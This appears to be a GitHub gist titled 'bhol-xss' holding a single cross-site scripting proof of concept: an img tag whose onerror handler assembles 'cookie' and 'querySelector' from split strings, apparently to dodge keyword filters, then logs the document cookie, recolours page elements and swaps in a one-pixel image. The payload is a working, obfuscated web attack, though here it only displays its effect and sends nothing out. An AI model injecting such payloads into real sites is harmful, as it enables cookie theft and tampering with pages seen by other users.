Skip to content

Instantly share code, notes, and snippets.

@camelcaseblog
Last active Feb 14, 2022
Embed
What would you like to do?
bhol-xss
<img
id="xss-image"
src="/"
onerror="d = document;
c = ('cooki' + 'e').trim();
qs = 'queryS' + 'elector';
console.log(d[c]);
d[qs + 'All']('.top_nlsitem').forEach(n => n.style.backgroundColor = 'green');
d[qs]('#xss-image').src = 'ht' + 'tps://upload.wikimedia.org/wikipedia/commons/c/ca/1x1.png';"
/>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment